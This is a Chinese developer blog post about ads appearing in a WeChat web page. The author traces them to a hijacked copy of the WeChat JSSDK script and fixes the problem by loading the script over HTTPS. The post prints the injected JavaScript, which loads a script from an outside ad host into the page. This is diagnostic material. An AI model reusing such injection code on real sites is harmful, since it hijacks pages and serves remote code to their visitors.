dns劫持!导致微信jssdk上挂广告

最新推荐文章于 2022-05-19 23:11:00 发布
最新推荐文章于 2022-05-19 23:11:00 发布
阅读量1.7w 收藏 3
点赞数
分类专栏: 微信
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bestcjt/article/details/78797934
版权

这几天在做一个微信的投票网页,用的是vue+quasar UI框架,结果这几天发现偶尔上网页后有广告,如下图红色方框


以为自己的虚拟主机被攻击,但反复检查了都感觉没啥问题,然后怀疑是不是quasar这个框架有问题,因为我第一次用这个UI框架,是外国的,看着很正规的,也是反复查了,也没发现什么问题,也不是一直会出现,偶尔才出现一次,我就一直刷新,我先是截了正常时的网络访问状况



不知刷新了多久,终于刷出了广告,看!果然有问题了,jwexin-1.2.0.js这个是微信网页jssdk的文件,可这个为啥下面又重新加载了还带上了参数



我点了第一个jsweixin-1.2.0.js,果然发现了问题了,这就是生成广告的脚本



这是广告js的代码

var _atn_obj_ = new Object; 
_atn_obj_.oldurl = 'http://res.wx.qq.com/open/js/jweixin-1.2.0.js?cHVzaA=1513177208'; 
_atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7My4PMz8jMzcjKzcrHoMrNzc3Lg7bfxtHO0dLOg82Dy8vPys/Pg86DzsrOzM7IyM3Px4POys7MzsjIzc/Hz8vLzs7IzYPKzcrJyw=='; 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);


到此我的代码没问题,可能就是所谓的dns劫持了

我将微信jssdk引用方式改成https,好像有点效果

<script type='text/javascript' src='https://res.wx.qq.com/open/js/jweixin-1.2.0.js'></script>



蔡挨踢
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用js屏蔽被http劫持的浮动广告实现方法
11-30
最近发现网站经常在右下角弹出一个浮动广告,开始的时候以为只是浏览器的广告。 后来越来越多同事反映在家里不同浏览器也会出现广告。然后深入检查了下,发现网站竟然被劫持了。 然后百度了一大堆资料,什么http劫持dns劫持、运营商劫持之类的,确定真的是中招了。看图: 真是偷梁换柱啊,被插入广告代码了。真是无良奸商,什么都做得出。 然并卵,最重要的解决办法是啥?然后把问题扔给了运维的同事。 最终结果是解决不了。没错,就是这么的坑爹。除非采用https。网上那些什么打电话、发信投诉之类的貌似没啥用。可能是运维太烂了。反正结果就是没结果。 然后,没办法啦。只能我们大前端自己想办法屏蔽啦。然后开启了研
java 支付宝 接口开发
qq_27674137的博客
03-27 673
用的是支付宝的即时到帐支付功能和微信的扫码支付功能,相比起来,个人感觉支付宝的文档和接入方式都比微信的容易理解和操作,也不用自己写页面,接入起来比较方便,毕竟是支付起家的,比微信支付少很多坑,下面就分别介绍着两种支付的接入方法。1、申请签约目的是得到开发使用的合作伙伴身份(PID)和MD5秘钥,申请地址(即时到账收款):https://b.alipay.com/order/productDetai...
前端炫酷登录页,拿来就能用
热门推荐
lb6514052的博客
05-19 4万+
一. 炫酷星空 代码 <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>运营系统登录页</title> <link href="static/css/login.css" rel="stylesheet" type="text/css"> &...
第三方支付平台支付接口及回调接口开发
03-06 5001
http://blog.sina.com.cn/s/blog_91632dbd0102vgse.html 作为开放式的B/S架构程序,无论所属电商,金融,机械制造,企业OA,ERP,CRM,CMS等等行业或系统中,第三方支付以及银联支付的业务一定是客户关心所在,也是保证客户系统盈利运营的一个重要保障。通常这种B2C或者C2C系统的开发,商户用户所关注的支付平台大多离不开“阿里支付宝,快钱
java版+支付宝支付和微信支付(一)(含源码)
qukaiwei的博客
12-29 4万+
最近公司在做支付模块,在接入过程中遇到了很多坑,费了不少事,现在分享一下接入方法,也记录一下,以后可能还用的到。用的是支付宝的即时到帐支付功能和微信的扫码支付功能,相比起来,个人感觉支付宝的文档和接入方式都比微信的容易理解和操作,也不用自己写页面,接入起来比较方便,毕竟是支付起家的,比微信支付少很多坑,下面就分别介绍着两种支付的接入方法。支付宝支付1、申请签约目的是得到开发使用的合作伙伴身份(PID
微信网页缓存多久会自动刷新_清空DNS缓存的两个小方法
weixin_39761422的博客
10-18 1197
什么是DNS缓存?这个缓存有什么危害?相信大家平时使用浏览器时,有时候会遇到一个很奇怪的问题,就是Mac打开许多网站如百度网站,都是可以访问的,但是在打开某个特定网站时,却发现浏览器提示检测不到网络连接,这种部分网站提示断网无法访问但实际上电脑并没有断网的问题,就是由于浏览器DNS缓存导致的。解决方式也很简单,清空DNS缓存即可,CleanMyMac X版本作为一款专业的Mac系统清理软件,其中就...
dns劫持了怎么处理 5种方法教你处理
douya0012的博客
12-29 2万+
域名dns劫持怎么办?应该怎么处理呢?域名DNS劫持,第一时间联系服务商,查询DNS是否正确,其次检查网站是否被马,导致出现劫持问题等。域名dns劫持怎么办?下面有简单的5钟方法,你可以试试。 首先我们来说下什么是域名DNS劫持? 我们在上网过程中都有遇到过网页莫名跳转这些情况,打开的目标网站不是原来的内容,反而跳转到了未知的页面,即使终端用户输入正确的网址也会被指向跳转至那些恶意网站,或者本来能正常访问的页面,突然就打不开了,这就是DNS劫持,亦可称域名劫持。 1、肯定优先联系自己服务商,确认DN
运营商劫持(DNS/HTTP302)
Yangyang
06-03 2万+
本人以网络技术出身,近两年接触CDN网络,处理了一些CDN方面的网络问题,大多数以运营商丢包,延迟抖动为主,也处理一些硬件故障,比如机械硬盘的读写io测试,内存条兼容性测试,服务器IPMI规划等。这篇文章打算把自己对运营商对资源请求的劫持写下来,这个其实不是很罕见的事例,也不是网上找不到解决办法,也不是无法理解的尖钻技术,只是罗列一下自己的所知。CDN网络访问拓扑既然提到了CDN网络,那就顺带提一...
HttpDNS调度微信域名过程
07-03
HttpDNS是为移动客户端量身定做的基于Http协议和域名解析的流量调度解决方案,专治LocalDNS解析异常以及运营商域名劫持
微信jssdk语音录制和上传下载
01-08
//微信上传下载媒体文件 // 这里不能加上s,不然保存不了amr文件 $url = "http://file.api.weixin.qq.com/cgi-bin/media/get?access_token={$access_token}&media;_id={$media_id}"; ffmpeg下载地址 ...
微信jssdk+java版+jsp源码
12-07
微信开发入门教程 jssdk,通过config接口注入权限验证配置java+jsp微信开发教程,功能:扫描二维码,拍照、本地选图,图片预览,上传图片,下载图片,获取当前网络状态,查看地理位置,获取当前地理位置打开地图,...
微信Jssdk调用实例(三层架构非mvc)
09-19
微信Jssdk调用的demo采用三层架构,并使用数据库来缓存全局jsapi_ticket,避免调用超出次数,内仅含微信分享给朋友以及分享至朋友圈两个接口的调用。内含数据库sql文件以及使用文档,代码中也有详细的注释,简单易懂...
微信JSSDK分享功能图文实例详解
10-17
主要介绍了微信JSSDK分享功能,结合图文形式详细说明了微信分享功能的常见接口、使用方法及操作注意事项,并结合具体实例进行说明,需要的朋友可以参考下
微信jssdk逻辑在vue中的运用详解
01-19
微信 jssdk 在 vue 中的简单使用 import wx from 'weixin-js-sdk'; wx.config({ debug: true, appId: '', timestamp: , nonceStr: '', signature: '', jsApiList: [] }); wx.ready(() => { // do something...
spring java图片上传源码.rar
最新发布
04-26
源码实现了图片上传功能,可供相关功能开发的小伙伴参考学习使用。
新入职员工工作总结范文大全(篇).docx
04-26
工作总结,新年计划,岗位总结,工作汇报,个人总结,述职报告,范文下载,新年总结,新建计划。
微信jssdk在电脑上不报错 在手机上报失效签名
06-09
可能是因为微信JSSDK需要在服务器端进行签名,而不是在客户端进行签名。在电脑上,由于你的服务器和客户端都在同一网络环境中,所以签名可能是有效的。但在手机上,客户端是通过移动网络连接到服务器,签名可能会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值